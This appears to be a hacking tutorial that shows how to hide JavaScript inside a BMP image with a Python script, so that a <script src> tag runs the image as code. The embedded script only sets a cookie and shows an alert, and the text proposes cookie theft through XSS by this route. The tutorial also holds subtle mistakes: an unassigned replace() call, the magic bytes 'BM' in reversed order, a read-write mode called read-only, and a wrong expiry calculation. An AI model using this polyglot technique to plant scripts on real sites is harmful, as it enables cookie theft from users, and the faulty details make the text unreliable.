Image File Hacking

 

Overview of Image File Hacking

Python provides very powerful features to handle files. Python can open a binary file and can change or append information to it. If you add a script for various types of image files used on the Web, you can create a hacking tool that has powerful features. Let's create a simple program to insert a JavaScript handling cookies into a bitmap (BMP) file.

Overview of Image File Hacking

First, let's create the “hello.bmp” image. You can view HEX values by opening the image with an editor. The first two bytes are magic numbers used to identify a bit map file. “0x4D 0x42” are the ASCII code points for each “B” and “M”, and the following 4 bytes indicate the size of the BMP file.

BMP File Structure

Image File Hacking

First, let's create a script and insert it into the bitmap file. The browser has the ability to create and save a cookie. A cookie is small file with information that is recorded on the PC for a web browser. Browser store cookies in their own memory space and file format, and a programmer will often use cookies to store login information and session information for the user. If a hacker obtains a cookie, it can be used in various methods of attack. The following script creates a cookie, saves information into it, and prints a message in the alert window.

name = 'id'; value = 'HongGilDong'; var todayDate = new Date(); todayDate.setHours(todayDate.getDate() + 7); document.cookie = name + "=" + escape( value ) + "; path=/; expires=" + todayDate.toGMTString() + ""; alert(document.cookie)

hello.js

Cookies are stored as a pair of (name, value). Here name ='id' and value ='HongGilDong' are stored in the cookie. The Cookie has a valid time since here, the effective time is set to 7 days. Finally, a display script is added to the alert window that the cookies have been set.

Now, let's create a program to insert a script into a bitmap file.

fname = "hello.bmp"   pfile = open(fname, "r+b")                               #(1) buff = pfile.read() buff.replace(b'\x2A\x2F',b'\x00\x00')                  #(2) pfile.close() pfile = open(fname, "w+b")                             #(3) pfile.write(buff) pfile.seek(2,0)                                               #(4) pfile.write(b'\x2F\x2A')                                    #(5) pfile.close()   pfile = open(fname, "a+b")                              #(6) pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')            #(7) pfile.write(open ('hello.js','rb').read()) pfile.close()

ImageHacking.py

This is a simple example that opens a binary file and adds a script.

(1) Opening a Binary File (read mode): open the hello.bmp file. “r+b” indicates the read-only mode of binary files. The results are stored in the variable “buff”.

(2) Removing Error: The “*” and “/” characters are replaced with a space because they can generate an error when the script is executed. When you run print “\ x2A \ x2F”, you can see an ASCII code.

(3) Opening a Binary File (write mode): open the hello.bmp file. “w+b” indicates the write-only mode of the binary files. It records the stored content in the variable “buff” into the hello.bmp file.

(4) Moving the Location of the Files: The “seek(2,0)” function moves the cursor reading the files from the starting point by two bytes.

(5) Inserting Comment: Insert “/*” which indicates the start of a comment behind the magic number. The magic number is a number used to identify a bit map file. Even if some damage has occurred in the remaining data, the browser can read the bitmap file if only the magic number has been properly recognized.

(6) Opening a Binary File (append mode): open the hello.bmp file. “a+b” indicates an append-only mode. What is recorded from now on will be added to the existing hello.bmp file.

(7) Inserting Comment: Insert “*/”, which indicates the end of the comment. The bitmap image part is commented out when the script runs.

The program is run, and the bitmap file size slightly increases due to the additional script. The quality of the image seen by the human eye is the same. If you open the bitmap file in an editor, you can verify that the file has been changed as follows.

the Result of ImageHacking.py

Let's create a simple HTML page to open the bitmap file in which the script was planted. The first line consists of the code that displays the hello.bmp image on the screen, and the second line is the code that runs the script that has been added into hello.bmp

<img src="hello.bmp"/>              <!-- Image Output --> <script src="hello.bmp"></script>   <!-- Run the script -->

hello.html

the Result of hello.html

“hello.js” is created here, and it simply saves a cookie and prints its value to the alert window. Let's assume the following situation. A hacker inserts a script to transfer the cookie information from the bitmap file to other sites. People download a bitmap file that the hacker put on a bulletin board and run it inadvertently. At that moment, the user's Cookie information is transferred to a site intended by the hacker. A hacker can therefore use this technique to implement an XSS attack.